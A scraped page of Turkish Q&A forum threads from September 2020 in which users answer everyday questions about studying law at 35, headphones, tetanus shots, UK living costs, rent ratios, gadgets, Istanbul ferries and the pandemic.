Giriş
(15)

35 yaşımda İstanbul Hukuk'a girdim. Tavsiyeleri alayım.

habarbey
Sb. Nasıl yaparım? Gaza geldim bir miktar. Turizmde çalıştım uzun yıllar, gececi falan takılırım bir yerde en kötü. Hali hazırda çalışıyorum zaten. Türkçem iyidir, İngilizce ve Fransızca biliyorum, Almanca ve İspanyolca'da başlangıç düzeyindeyim, bilmiyorum yardımı olur mu? Çalışarak yapmaya çalışac
Sb. Nasıl yaparım? Gaza geldim bir miktar. Turizmde çalıştım uzun yıllar, gececi falan takılırım bir yerde en kötü. Hali hazırda çalışıyorum zaten. Türkçem iyidir, İngilizce ve Fransızca biliyorum, Almanca ve İspanyolca'da başlangıç düzeyindeyim, bilmiyorum yardımı olur mu? Çalışarak yapmaya çalışacağım, diğer türlü hayatımı idame edemem. Bu arada en son ilkokulda ders çalışmıştım, bilmiyorum ve korkuyorum. Her türlü tavsiyeye açığım.
0
habarbey
(05.09.20)
Eskiden olsa okunurdu ama artık okuma işleri zaman kaybı. Hukuk mezunu işsiz çok. Vereceğin zaman neye değecek bunu düşün derim. Hobi için ilgi duyduğun için kendini geliştirmek için vize final çalışılmaz. Hukuk'ta sosyal ortamda zayıftır. Çekilmez bence
0
kickboxer
(06.09.20)
Maddi bir beklentim pandemiyi yok sayarsak yok. Üniversite bitirmedim, bir miktar orada, bir miktar da akademik kapı açılması yönünden beklentim var. Aslında, ilgim de var hukuka. Ben aslında bitirebilir miyim veyahut nasıl bitiririm yollu bir tavsiye arıyorum.
0
🌸habarbey
(06.09.20)
Size yapamazsın diyenlere kulak asmayın, yaparsınız. son düzenlemeler ile birlikte kanunlar çok anlaşılır hale geldi, yeter ki pes etmeyin. ilk sene temeli iyi atarsanız sonraki yıllar çatır çatır gider. temele yüklenmezseniz sonraki senelerin tamamında "ne anlatıyor bu hoca?" dersiniz. (bizzat tecrübemdir). roma hukuku gibi alanlar hiçbir işinize yaramaz, dersi geçecek kadar öğrenseniz yeter. medeni hukuk, hukuk başlangıcı gibi dersler kraldır ama bunlara gerekirse gece gündüz çalışın. hatta şimdiden bir medeni hukuk ders kitabı alıp önden başlayabilirsiniz.

üzmek istemiyorum ama hukukumuz daha çok osmanlıca/farsça terimler üzerine kurulu, ingilizce ve fransızcanın "bu aşamada" size pek bir faydası olmayacaktır. ancak mezuniyetten sonra 2-0 önde başlamış olursunuz.
0
trajikomix
(06.09.20)
Arapça ve Farsça kökenli kelimeler ve etimoloji ilgi alanım, oralarda sıkıntım yok. Bu aşamada Fransızca yardımcı olabilir diye medeni hukuk kabulünden yola çıkmıştım, saçmalıyor olabilirim.
0
🌸habarbey
(06.09.20)
Senin yaptigini yapan muhendisler gordum yurtdisinda. Muhendislikte pek para yok, muhendis ustune hukuk okumus adam da cok az. Dolayisiyla muhendis temelli hukuk adami kontenjanina girince muz ortayi kesiyorlar, sende yetenekli isen gelisine iyi vurursan kalecinin cikarma sansi yok, koseyi donenleri gordum.

Burda demek istedigim daha once okumus oldugun ya da bildigin isin ustune hukuku oturtabilecekmisin ona bir bakmak lazim bence. Eger oturmuyorsa, duz avukat olacaksan ben olsam hukuk diplomasanin bokunun ciktigi ulkede o ise girmem. Turizm + hukuk da yukarda behsettigim gibi bir potansiyel var ise, ustune dil falan da biliyorum demissin, o zaman yurunebilir. Heyencanlanmadan once sektore bir bakmak lazim zira okul bir suru bas agrisi, sonunda ciddi mukafat yok ise 35'den sonra cekilmez.
0
cooperr
(06.09.20)
Burada mesele yaparsın yapamazsın değil. Amaç ne önemli olan o. Çok zaman harcaman gerekecek.
0
kickboxer
(06.09.20)
amacin ne baskan? sinava girmissin, yerlesmissin, okul basliyor, ne diye bu bolume girip okumak istedigini cozsen iyi olur sanki. hobi olsun diye de okunur tabii ama en azindan belirle amacini.
0
baldur2
(06.09.20)
Öncelikle tebrik ederim!

Üniversitenin online olması size yaradı, dersleri bile takip ederseniz belki müsait olursanız. İstanbul Hukuk’taki arkadaşlar final döneminde ders çalışıyorlar onu da deli gibi yapıyorlar diye biliyorum, yoğun çalışıyorlar ama öncesinde o yoğun çalışma yok. Bence bir öğrenci bulup sorabilirsiniz çalışma sistemini.

İngilizce, Fransızca bilmeniz akademik açıdan çok önemli bence. Eğer akademik hukuk İngilizcesi dersi vs varsa İstanbul Üni’de alıp kendinizi geliştirmeye bakın. Yurtdışında uluslararası hukuk çalışabilirsiniz ki yurtdışı deneyimleriniz, bağlantılarınız da vardır kesin. Belki okulun Erasmus ihtimalinden yararlanırsınız işinizi de kaybetmeyecekseniz, Erasmus’ra alınan dersler, oradaki Üni ortadamı size akademik anlamda yardımcı olur. Uluslararası hukuk dışındaki alanları bilmiyorum hukuk yüksek lisans alanlarını araştırabilirsiniz bence bir. Marmara, İstambul Üni ya da diğer pek çok devlet üniversitesinden mezun avukatlar İngilizce bilmedikleri için ne kaybediyor bilmiyorum ama siz bildiğiniz için baya önde olabilirsiniz.

Hayırlı uğurlu olsun.
0
damba
(06.09.20)
Aslında bakarsanız akademik gelişim için girdim bu yola ve kriminoloji en başından beri beni buna iten yoldu. Ticari becerilerim çok az, hatta rezalet, çekirdek ailede iki akademisyen var. Doneler çerçevesinde oluru var gibi, olmaz ise de olmaz.
0
🌸habarbey
(06.09.20)
Hukukçu değilim ama tüm öğrencilere tavsiyem ilk seneden uzmanlaşabilecekleri alanları araştırıp kendi kendine de olsa araştırma yapmaları, sertifika, staj vs. şeklinde. İş alanlarından, İngilizce makalelerden, diğer hukukçularla konuşarak bu araştırmayı yapın. Önce okurum mezun olunca bakarım olmuyor.

Örneğin göçmenlik hukuku, ya da Türkiye'de yabancılara verilen servisler, telif hakları, internetle ilgili hukuksal konular vb.
0
kaset
(06.09.20)
Boşuna masraf etme bence
Avukatların yarısı asgari ücret kadar kazanıyor
Hukukta amaç sınıf geçmek değil özümsemek olmalı
Tavsiyem : mutlaka derse gir
Tebrikler ve başarılar
0
photo85
(06.09.20)
akademikten kastınız akademisyenlikse o iş sıkıntılı, araştırma görevlisi olarak girme yaşı 35. ha genel akademik gelişimse bunun için üni okumaya gerek yok bence, 4 sene de harcayacağınız parayla sağlam bir kütüphane kurarsınız. avukatlık yapmak ise bahtınız açık olsun.

okumasına okursunuz ama diğer öğrencilerle aradaki yaş farkı kendinizi alien gibi hissetmenize yol açar. bende birden fazla üni var, sonuncuyu 27 yaşında girmiştim, iletişim sıkıntı oluyordu bir yerden sonra, sizin için biraz daha zor olabilir zira hem yaşınız benim girdiğim yaşa göre daha ileri hem de 2000 doğumlularla muhatap olacaksınız ki cidden hayata bakış açısı ve mantalite olarak bir 80 lerde doğan nesle göre çok farklılar.

bu arada yakın çevremde hem avukat hem akademisyen olarak bir kaç hukukçu var, onlara bakarak şunu söyleyebilirim, çok okumanız ve araştırmanız gerekecek. bunun için vakit ve kafa ayırabilecekseniz korkmanıza gerek yok.

tebrik ederim.
0
issiz karga
(06.09.20)
Neyse en son ben bir okuyayım da gazım çıksın raddesine geldim, yazan herkese teşekkürler. Zaten önemi olduğundan ve olmadığından ötürü rahatım.
0
🌸habarbey
(06.09.20)
Tebrikler öncelikle, alakasız olacak ama bu yaşta bu bölümü nasıl kazandınız? İkinci öğretim olarak bile neredeyse ilk 5000 sıralamaya sahip. Yoğun bir çalışma programınız olmuştur diye tahmin ediyorum.
0
malaika
(06.09.20)
Allah kolaylık ve sabır ihsan eylesin....

Yabancı dillerin fakültede faydası olmaz ancak sonrasında çok olur.

Sınav dönemine yıgmadan düzenli çalışmak tek püf nokta. Bunu yaparsanız bitirirsiniz.
0
kitap arasında kalmış silgi tozu
(06.09.20)
(5)

noise cancelling kulaklık kullanan var mı? sesi tamamen kesiyor mu?

durme
ben kulaklıkla pek müzik dinlemiyorum, o yüzden ses anlamında kalite aramıyorum. tek aradığım özellik dışarı seslerini kesmesi. pahalı olmaması tercihim bu yüzden. üst komşumuz sürekli sandalye itip çekiyor, artık duymak istemiyorum, bu sesleri keser mi? sadece ses kesme özelliğini kullanabiliyor mu
ben kulaklıkla pek müzik dinlemiyorum, o yüzden ses anlamında kalite aramıyorum. tek aradığım özellik dışarı seslerini kesmesi. pahalı olmaması tercihim bu yüzden. üst komşumuz sürekli sandalye itip çekiyor, artık duymak istemiyorum, bu sesleri keser mi?

sadece ses kesme özelliğini kullanabiliyor muyuz müzik dinlemeden?



teşekkürler
0
durme
(05.09.20)
devamlı ve belirli bir frekanstaki sesi keser onlar. uçak, metro vb. sesleri kesiyor daha çok.
izlediğim onlarca incelemeden bunu anladım. senin için tıkaç lazım.
0
sutlu nescafe
(05.09.20)
xiaomi anc usb (type-c) girişli kulaklığı bir deneyin derim.

dilediğiniz kadar kesmeyebilir ama muhakkak sonuç alırsınız.

www.hepsiburada.com
0
mcsword
(06.09.20)
Eğer müzik açıksa bütün sesleri kesiyor. Müzik açık değilken, çok yüksek sesleri kesmiyor ama düşük sesleri kesiyor.

Ben genelde kahvecilerde falan çalışıyorum, orada kulaklığı takarsam (müziksiz ama toplantı falan) ortam uğultusunu ve etraftaki insanların konuşmalarını, mekan müziğini falan duymuyorum. Ama biri kahkaha atarsa, sandalyeyi sürükleyerek çekerse falan duyuyorum.
0
plutongezegendegilmi
(06.09.20)
Xiaomi true wireless, blueant pump air 2 ve bowers & wilkens kullandim,
Ne kadsr keserse o kadar vacum yapiyor. Bence rahat degil 100 liraya 3m’in fabrika icin mesafeye gore duymayi ayarlayabildigin kulakliklar da var.m, onlar da rahat degil. Rahat degil iste
0
artikyeterbe
(06.09.20)
Bende bose QC 3 var. 2010'da almıştım. Söylendiği gibi sabit gürültüleri iyi kesiyor, uçak, vapur motoru vs... İnsan sesini falan azaltıyor ama yok etmiyor müzik açmadan. Ama müzik açtın mı baya kopuyorsun dünyadan. Yeni kulaklıklarda belki ilerlemiş olabilir.

Ama müzik dinleme derdi yoksa 3M kulak tıkaçlarından alın. Ses kesmeli kulaklığa vereceğiniz paraya değmez.
0
mirafiori
(06.09.20)
(2)

evde vucut gelistirme

baldur2
iki tane dambilim var, su asagidaki program mantikli mi? baska ne onerirdiniz? bu asagidaki programa karin da eklemek gerekli mi? varsa alirim karin programi tavsiyeniz de. https://www.youtube.com/watch?v=TOsXq-5PkJc&list=PLBmjcuwol0K7dHixQll2ghbv44jtlrmqY&index=9bir de bu programi mesela her gun mu
iki tane dambilim var, su asagidaki program mantikli mi? baska ne onerirdiniz? bu asagidaki programa karin da eklemek gerekli mi? varsa alirim karin programi tavsiyeniz de.

www.youtube.com

bir de bu programi mesela her gun mu yapmaliyim yoksa 2 gunde bir mi?
0
baldur2
(05.09.20)
bu arkadaşa ulaştığına göre devamı gelecektir, bende aynı şekilde evde takılıyor ve inanılmaz verim alıyordum. sana tavsiyem tek bir kanala takılmadan herkesten biraz yararlanıp kendi antrenmanını oluşturman ve kesinlikle spor öncesi ısınma ve kendi ağırlığınla çalışmalar yapman.

not: 1.83 80kg 10kg çift dumbell'ı olan birisiyim. spor salonuna sadece sauna havuz ve masaj için gidiyorum. her gün uygula zamanla 2/1 oluyor zaten.
0
dirildimde geldim
(05.09.20)
sık sık köprü kur reis.
0
turbo sadık
(06.09.20)
(4)

Tetanoz aşısı hakkında doğru bilinen yanlış var mı?

Cesario
Geçende bir paylaşıma denk geldim ama instagram story'si olduğu için SS almayı unuttum. Özetle:Bir yerimiz kanadığı zaman tetanoz aşısı öneriyorlar ya, eğer o an tetanoz kapmışsak aşı bir işe yaramazmış. Çünkü aşının işe yaramaya başlaması için belli bir gün geçmesi gerekiyormuş. O esnada tetanoz ka
Geçende bir paylaşıma denk geldim ama instagram story'si olduğu için SS almayı unuttum. Özetle:

Bir yerimiz kanadığı zaman tetanoz aşısı öneriyorlar ya, eğer o an tetanoz kapmışsak aşı bir işe yaramazmış. Çünkü aşının işe yaramaya başlaması için belli bir gün geçmesi gerekiyormuş. O esnada tetanoz kapıldıysa zaten aşı olsak da bir işe yaramayıp hasta ölüyormuş.

Bayağı antikorlu vs açıklayıcı bir paylaşımdı.

Böyle bir şey doğru mu gerçekten? Yani kanadıktan sonra aşı olmamız tamamen bir şehir efsanesi mi, gönlü ferahlatmak için mi oluyoruz o aşıyı?
0
Cesario
(05.09.20)
Yanlış. O bakteri kuluçka evresi ortalama 8 gün falan, genelde de 5 gün içerisinde yapılması öneriliyor hatta
0
primetime
(05.09.20)
toplumdaki herkese çocukken en aza 4 doz tetanoz aşı yapılmış zaten, o anki aşı hatırlatma dozu denilebilir, vücudun daha güçlü cevap vermesi için. ayrıca yaralanma çok pis ve enfekte ihtimali yüksek ise aşı yanında immünglobulin verilir.
0
alicandan
(05.09.20)
abi zaten normal aşı takviminde tetanoz var. Yani çocukken oluyosun. Ama ortalama her 10 yılda bir repel doz olman gerekiyor. Eğer bir yerini yaraladığında son repel dozundan beri 5 yıl geçtiyse 10 sene geçmiş gibi davranıp yine aşı oluyosun. Sonuç olarak amaç bağışıklığı canlandırmak. Ayrıca @primetime da haklı kuluçka gününde
0
nundu
(05.09.20)
Askerde tetanoz aşısı zorunlu olarak yapılır. Ben askerden sonra tam bağışıklık için kalan dozlarını da yaptırmıştım. Aslında tetanoz olayında her paslı çivi, iğne tetanoza neden olmaz. Tetanozun bulaşması için batan cismin doğrudan toprakla temas etmiş olması gerekiyor.
0
silah taciri
(05.09.20)
(1)

Fransızca el yazısı okunması gerekiyor

acayip bi insan profili
merhabalar.Elimde bulunan cumhuriyet döneminin ilk senelerine ait bir kitaba, kitabın yazarı tarafından bir not ile birlikte imza atılmış. el yazısı olduğundan transkript edip translate'e de yazamıyorum. o yüzden dile hakim olup kelimeleri çıkarabilecek biri olması gerekiyor diye düşünüyorum.yardıml
merhabalar.

Elimde bulunan cumhuriyet döneminin ilk senelerine ait bir kitaba, kitabın yazarı tarafından bir not ile birlikte imza atılmış. el yazısı olduğundan transkript edip translate'e de yazamıyorum. o yüzden dile hakim olup kelimeleri çıkarabilecek biri olması gerekiyor diye düşünüyorum.

yardımlarınızı bekliyorum sevgili dostlarım.

imza sayfası: hizliresim.com
0
acayip bi insan profili
(05.09.20)
Çok uğraştım ancak tam çözemedim. Rayzuri ya da buna benzer isimde bir yer var çıkaramadım.
"Rayzuri türk devlet hastanesine ve doktorlara, dr x, dr y, dr z, dr ahmed sami, dr niZamettin bey vs."
Böyle bir şey çıktı. Eşimle birlikte baktık ve dr yazısı olduğunu düşünüyoruz.
0
manimani
(07.09.20)
(12)

Mesaj kutusu..

primetime
Herkese iyi akşamlar.Mesaj vs olayını çok kullanan biri değilim. Geçenlerde Cevap yazdığım bir konu Hk bir kullanıcı arkadaştan mesajgeldi. Bende cevap yazdım. Herşey normaldi. Fakat şimdi o kullanıcıdansürekli yeni mesaj gelmiş gibi görünüyor. Açıp bakıyorum mesaj falan yok. Bu ışık nasıl sönecek?
Herkese iyi akşamlar.Mesaj vs olayını çok kullanan biri değilim. Geçenlerde
Cevap yazdığım bir konu Hk bir kullanıcı arkadaştan mesaj
geldi. Bende cevap yazdım. Herşey normaldi. Fakat şimdi o kullanıcıdan
sürekli yeni mesaj gelmiş gibi görünüyor. Açıp bakıyorum
mesaj falan yok. Bu ışık nasıl sönecek?
Teşekkürler sevgiler..
0
primetime
(05.09.20)
çerezleri silmeyi dene gidecektir
0
basond
(05.09.20)
Olmadı:(
0
🌸primetime
(05.09.20)
ekranda mesaj kutusu nereye denk geliyorsa oraya siyah izole bamt ya da elektrik bamti yapistir. is gorur :)
0
turbo sadık
(05.09.20)
Gülmedim. Ama yine de tesekkurler
0
🌸primetime
(05.09.20)
Mesajı oku. Yani mesaj ışığına bas, son gelen mesajın üzerie de tıkla. Mesaj kısa olunca tıklamadan okunuyor ama üzerinetıklarsan tamamen açılır, okumuş olursun. Ya da ondan bir iki öncekinesajı tıklamadan okumussundur
0
rezilrusfaadam
(05.09.20)
Okunacak bir mesaj yok maalesef hocam
0
🌸primetime
(05.09.20)
Yani nesajı soluk beyaz renkte değil, parlak veyaz renkte yazılarla okumus olman gerek.
0
rezilrusfaadam
(05.09.20)
Evet anladım hocam, hepsi okunmuş görünüyor.
0
🌸primetime
(05.09.20)
Ben ekşi mesajlarından bahsediyorsun sandım. Ekşi duyuru mesajlarında böyle bir sorunla karsılasmadım.
0
rezilrusfaadam
(05.09.20)
Yok hocam, burası. Teşekkürler.
0
🌸primetime
(05.09.20)
Aynı kişiden bir mesaj daha atmasını iste eğer o da silmediyse. Muhtemelen çözer bu
0
IncredibleMau
(05.09.20)
O mesajı silmeden sönmeyecek. Duyuru'da öyle bir bug var bir süredir. Aynı kişiye yeni bir mesaj atın, eski mesajı komple silin, anca öyle.
0
kobuzchu kiz
(05.09.20)
(4)

Banvit salamlar kaliteli midir?

trablon
tenya menya bişiler diyorlar salamlar için.kaliteli salam alın diyorlar çiğ yemek için. pınar daha pahalı banvid sağlıklı mıdır yoksa pınar mı tercih etmeliyim?
tenya menya bişiler diyorlar salamlar için.kaliteli salam alın diyorlar çiğ yemek için. pınar daha pahalı banvid sağlıklı mıdır yoksa pınar mı tercih etmeliyim?
0
trablon
(05.09.20)
Salam genelde pek önerilmiyor. Banvit bu sektöre de mı girdi bilmiyorum. İçeriğinde tavuk vs olabilir. Pınar salamı severek tuketirdim.
0
primetime
(05.09.20)
Hocam ayıptır söylemesi bi kere İtalya'ya gittim. Orada yediğim şey salamsa, buradakiler salam değil, plastik. Bıraktım ondan sonra salam yemeyi, şimdi tanıdık kasaba sucuk yaptırıyorum onu yiyorum, başka da hazır et yemiyorum.

Bahsettiğim fark lezzet değil, yani o da var ama, onun et olduğu belli. Buradakinin ne olduğu belli değil. İlla yiyeceğim diyorsanız da iyi pişirip yiyin.
0
plutongezegendegilmi
(05.09.20)
@pluton Malesef Türkiye'deki salam kültürü ile Avrupa kiyaslanamaz. Burada Türkiye'deki salama benzeyen tek şey almanlarin sarimsakli salami var o.

Bir dönem et firmasinda staj yapmis biri olarak iade alinan ürünlerin (et, tavuk vs) geri dönüşüm yapıp salam sosis olduğunu söyleyebilirim. Kısacası kalite bekleme salam sosis gibi ürünlerden. Kalite ancak füme et, sucuk gibi şeylerde olabilir.
0
logisticsmanager
(05.09.20)
tenya falan olmaz ama gene de yeme bence, banvit ya da pınar fark etmez bu arada, ikisi de artık etlerden yapıyorlar ürünleri, nasıl yapıldığını görsen zaten yemezsin.
0
zikardo
(06.09.20)
(5)

bugün ingiltere yaşamaya başlasak başlıca masraflarımız ne olur?

avatar is back
barınma, yiyecek ve ısınma hariç. aklıma sadece sağlık sigortası geliyor. onun da yıllık ücreti 1300-1500 sterlin civarı.başka ne olabilir?
barınma, yiyecek ve ısınma hariç. aklıma sadece sağlık sigortası geliyor. onun da yıllık ücreti 1300-1500 sterlin civarı.

başka ne olabilir?
0
avatar is back
(05.09.20)
ulaşım iletişim kıyafet
0
basond
(05.09.20)
he onlarda var tabi de, bazen deniyor ya tamam alım gücü yüksek ama bazen öyle giderler oluyor kii... işte o giderleri merak ediyorum :) sağlık sigortası zannediyordum ama o da ucuzmuş zaten
0
🌸avatar is back
(05.09.20)
Ben 6 ay kirada kaldığımda council tax ödemistim, miktarını hatırlamıyorum ama, kaldığınız yerde bu şekilde vergi ödemeleri mevcut mu bakmanizda fayda var.
0
candanag
(05.09.20)
sayet Londra disi ise araba olmazsa olmaz. Sifirdan ehliyet, araba, sigorta vs bir suru basagrisi
0
neverletyougodown
(05.09.20)
nerede ve hangi statu ile yasamak istediginize gore degisir..2 yatak odali bir eve ortalama £650 verirsin (tek yatak odali yerler £500-550 olur), bunun council tax'i (emlak/belediye vergisi) £150 civaridir (bir odali olursa £100-120) ortalama, tek kisiyseniz %25 indirim alirsin.enerji+su+internet faturan en az £100. saglik sigortasi, en son yillik £400 idi zam geldi diyorlar. gida, kisiye bagli degisir; ama £200-250 olur (bunu 150ye kadar dusurursun biraz dikkatli olursan). ulasim, gunluk gittigin yere gore degisir. ben universitede calisiyorum, benim aylik sinirsiz otobus biletim £30; fakat, sirketinin ulasim firmasiyla anlasmasi yoksa 2 katina en az cikar. londra'da falan bu en az £100dir bellki..

evi birileriyle paylasirsan, 700-800 civarina yasarsin birkac metropol haricinde. cambridge'te yasacagim dersen, sana £800 lira oda kirasi cikarirlar..
0
ubi dubium ibi libertas
(05.09.20)
(1)

F/p webcam onerisi

karpuzpeynirekmeksu
Online egitime basladim ve desktop pc kullaniyorum. Logitechler ucmus gitmis fiyat acisindan. Deneyip memnun kaldiginiz veya cevrenizden duydugunuz webcam modeli var midir?
Online egitime basladim ve desktop pc kullaniyorum. Logitechler ucmus gitmis fiyat acisindan. Deneyip memnun kaldiginiz veya cevrenizden duydugunuz webcam modeli var midir?
0
karpuzpeynirekmeksu
(05.09.20)
ben cep telefonunu webcam olarak kullanıyorum, eski bi iPhone 6 vardı gayet iyi çalışıyor bu amaç için, kalitesi de epey iyi. öneririm.
0
roket adam
(06.09.20)
(1)

internet ve word excel için laptop

kelepir
arkadaşlar internete gireceğim word excel powerpoint kullanacağım en ucuz laptop hangisidir ? var mı tavsiyeniz al kullan diyebileceğiniz. 2000-2500 bantı işimi görür mü ?
arkadaşlar internete gireceğim word excel powerpoint kullanacağım en ucuz laptop hangisidir ? var mı tavsiyeniz al kullan diyebileceğiniz. 2000-2500 bantı işimi görür mü ?
0
kelepir
(05.09.20)
Lenovo ideapad ip3 var. Gayet güzel.
0
dickens
(06.09.20)
(2)

Kadikoy vapur

kırmızıgözlüağaçkurbağasıyeşili
Besiktastan kadikoye hala 00.00 sonrasi vapur var mi?
Besiktastan kadikoye hala 00.00 sonrasi vapur var mi?
0
kırmızıgözlüağaçkurbağasıyeşili
(05.09.20)
Hayır babus. 21de mi ne bitiyor. Üsküdar motorları çalışıyor.
0
allah yazdiysa bozsun
(05.09.20)
eskiden 21.00 gibi bitiyordu artık uzattılar. beşiktaş son kalkış 23.45 görünüyor.

www.sehirhatlari.istanbul
0
nimberjack
(05.09.20)
(6)

Salgın hiç bitmeyecek mi?

asaf
Aşı ya da mutasyon seçenekleri gerçekleşmezse yıllarca okullara gitmeyip, maske takıp, yarım, tatsız, bereketsiz bir hayat mı yaşayacağız?
Aşı ya da mutasyon seçenekleri gerçekleşmezse yıllarca okullara gitmeyip, maske takıp, yarım, tatsız, bereketsiz bir hayat mı yaşayacağız?
0
asaf
(05.09.20)
aşı bulunmazsa ve mutasyon (kötüye) vs. gibi şeyler olmazsa, yeterince insan öldükten sonra bağışıklık kazanacak insanlık ve yeni normaller ile hayat devam edecek.
0
AlsterWasser
(05.09.20)
evet :-(
0
ankarakecisi
(05.09.20)
Bu salgından önceki Sars salgını 1,5 yılda bitmiş. Bu salgın 2019 yılının sonunda çıktı. Daha bir yıl olmadı. Eğer önceki Sars salgını gibi olursa önümüzdeki bir yıl içinde bitebilir. Herkes yazın gelmesine iyi gözle bakıyordu ama bence kış etkileşimi azaltabileceği için (tatil ve gezme anlamında) vaka sayısının azalmasında faydalı olabilir. İşin kötü kısmı Sars salgınları belirli aralıklarla tekrar ortaya çıkıyor. Şimdi geçse bile 10, 15 yıl sonra tekrar gelmeyeceğini kimse bilemez.
0
dissendium
(05.09.20)
bu lanet virus en erken 2025'e kadar bizimle birlikte. 2025 sonrasi normal grip virusu gibi her sene asi olup korunabilinir bir sey haline gelecektir.

2025 dememin sebebi: asi calismalarinin tamamiyle bitirip, milyarlarca insan icin asiyi hazirlamak, ulastirmak ve uygulamak en az 4-5 yil surecek. zaten 2020 bitti sayilir.
0
rm
(05.09.20)
Aşı bulundu. Büyük oranda hafif geçirilmesine fayda sağlayacak. Sürü bağışuklığı yok. Her yıl o aşı güncellenerek yapılacak. Aşıdan sonra en az 5 yıl tedbire devam edeceğiz
0
photo85
(05.09.20)
Aşının 20 yıl sonra bulunduğu bir sürü hastalık var. Bir ikincisi bir kez hasta olmakla bağışıklık kazanılmayabiliyor. Bir doktor bir kez atlatmış, ikincisinde hayatını kaybetmiş. Sürü bağışıklığı deneyen ülkeler de fena çuvalladı. İsviçre ve İngiltere.
0
🌸asaf
(05.09.20)
(4)

Bir dizi vardı...

canercuxy
hollywood'da yaşayan bir aktör, onun başarısız abisi (adı johnny'li bir şeydi) ve onların arkadaşlarını anlatıyordu. 2000'ler dizisiydi. ana karakterin film maceraları, başarıları başarısızlıkları vs vs komedi dizisiydi. çok bir şey yok anımsadığım. farkındayım "bir şarkı vardı nı nı nı diye neydi a
hollywood'da yaşayan bir aktör, onun başarısız abisi (adı johnny'li bir şeydi) ve onların arkadaşlarını anlatıyordu. 2000'ler dizisiydi. ana karakterin film maceraları, başarıları başarısızlıkları vs vs komedi dizisiydi.

çok bir şey yok anımsadığım. farkındayım "bir şarkı vardı nı nı nı diye neydi adı" der gibi oldu ama eldeki bilgiler bunlar :)

neydi bu dizinin adı?
0
canercuxy
(05.09.20)
two and a half man değil demi oradaki charlie oyuncu değil de reklam müzik yapımcısıydı sanki
0
basond
(05.09.20)
entourage
0
tamyaglipeynir
(05.09.20)
yahu bu joey olmasın?

(git: www.imdb.com)
0
calucifer
(05.09.20)
@tamyaglipeynir, @kiyiya vuran dildolar, çok teşekkürler evet entourage
0
🌸canercuxy
(05.09.20)
(1)

Askerdeyken mahkeme erteletme talebi

ya ben lan neyse
mahkemesi olan sanık askere gittiyse mahkeme tarihini erteletmek için ne yapabilir?
mahkemesi olan sanık askere gittiyse mahkeme tarihini erteletmek için ne yapabilir?
0
ya ben lan neyse
(05.09.20)
En yakın mahkeme vasıtasıyla (Komutanlık vasıtasıyla da olabilir, emin değilim) mazeret dilekçesi verip duruşmanın ertelenmesini ister.
0
praetor
(06.09.20)
(11)

sizce ev kirası, maaşın yüzde kaçı kadar olmalı?

Transa
sb
sb
0
Transa
(05.09.20)
yüzde 10-40 arası olabilir. keyfinize göre. yarısını geçerse göçersiniz :-(
0
ankarakecisi
(05.09.20)
20-25'ten ötesi yorar.
0
roket adam
(05.09.20)
Almanya'da 30% civarını geçince ev sahipleri uzak duruyor sizden. Bence de ideali 35% civarını çok geçmemesi. Maaşın yarısını ev kirasına verirsem, nasıl tatil yapacağım, hangi hobime para kalacak, nasıl hafta sonu bir yere giderim?

Öğrenciliğimde de bursumun yarısını vermiyordum kiraya, hep bu hesapla geçindim.
0
buf-e kür
(05.09.20)
Cesitli formuller var, senelik burut maasin/40 gibi.
0
cooperr
(05.09.20)
Bana gore en fazla yuzde 25. Yuzde 30 son. Yuzde 40 falan hayatini kisitlayabilir.
0
baldur2
(05.09.20)
%30-35 civaridir. hep hesabimi buna gore yaparim. alacagim maas kiranin uc katindan daha azsa olmem ama gecim sikintisi cekerim.
0
yoggi
(05.09.20)
bütün gelirin 25-35% arası diyelim. gerçekçi rakamlarsa genelde 40% oluyor tek çalışanlı aileler için.
0
dirildimde geldim
(05.09.20)
Fatura + ev giderleri (yemek dahil) + kira %25'i geçmeyecek şekilde ben rahat yaşayabiliyorum, sonrası sorun oluyor.
0
plutongezegendegilmi
(05.09.20)
25i geçmemeli.
0
nuisance
(05.09.20)
%33 işyerine ve iş sonrasi aktivitlere max. yakınlık için!
0
artikyeterbe
(06.09.20)
%25 maks. ama o kadar da zengin degilsiniz.

refah icin ise %20 maks. bunun alti sizi standart olarak yukari ceker.

%6 altindaysa ve odediginiz para kendini cikariyorsa kazanmaya baslarsiniz.
0
baldan kaymak
(06.09.20)
(1)

İşbankası maximum sonradan taksitlendirme

iddaaci
Merhaba, maximum kart sonradan taksitlendirme yapıyor ama çok faiz alıyor. Faizsiz bir yöntemi var mı? 7000. Tl’lik bir işlem.
Merhaba, maximum kart sonradan taksitlendirme yapıyor ama çok faiz alıyor. Faizsiz bir yöntemi var mı? 7000. Tl’lik bir işlem.
0
iddaaci
(05.09.20)
7000 tl lik nAkit avans kullanabilirsin
0
deepfear
(08.09.20)
(4)

En sağlam powerbank hangisi? [Outside streaming için]

winston insani
Merhabalarİnsanlar 6-7 saat outside streaming yapıyorlar, hangi powerbank'leri kullanıyorlar peki? Birden fazla mı kullanıyorlar yoksa gayet böyle güçlüleri de var mı?
Merhabalar

İnsanlar 6-7 saat outside streaming yapıyorlar, hangi powerbank'leri kullanıyorlar peki? Birden fazla mı kullanıyorlar yoksa gayet böyle güçlüleri de var mı?
0
winston insani
(05.09.20)
xiaomi 20.000 mah lık powerbank var bende. iphone 6s'i 6-7 kere fulluyor. çok memnunum ama streaming olayını bilmiyorum. 6-7 saatte kaç batarya gider fikrim yok.
0
xrated
(05.09.20)
bende mophie var. bayaa tuzlu bir sey (ben almazdim sahsen, hediye) ama ne zaman sarj ettigimi unutuyorum. macbook filan da sarj ediyor usbc oldugu icin.
0
yoggi
(05.09.20)
stream ile falan alakasız ama yine de söylemeye geldim.

5 sene önce bim'e xiaomi 10 binlik gelmişti. hala daha taş gibi kullanıyorum. o zaman samsung s5 kullanıyordum, sonra iphone se'ye geçtim. sık sık kullanıyordum, ama özellikle son 1 yıldır neredeyse her gün kullanıyorum. gerçekten çok sağlam.

sanırım şimdi daha büyük güçte olanları da çıktı. bakılabilir.
0
invictae
(05.09.20)
Bence romoss 4 yıldır kullanıyorum hâlen ilk günkü gibi
0
muratback
(06.09.20)
(5)

Çatlayan araba camını düzeltmek

chicha_v2
İnternette bi solüsyon gibi bi şeyle yapıyorlar ama internetten söyleyecek vaktim yok. Yarın İstanbul'da nereden alabilirim bunu? https://www.hepsiburada.com/visbella-araba-on-cam-kirik-catlak-tamir-onarim-seti-pm-HB000009E706
İnternette bi solüsyon gibi bi şeyle yapıyorlar ama internetten söyleyecek vaktim yok. Yarın İstanbul'da nereden alabilirim bunu?

www.hepsiburada.com
0
chicha_v2
(05.09.20)
denenmişi var mucize bekleme hiç işe yaramayabilir
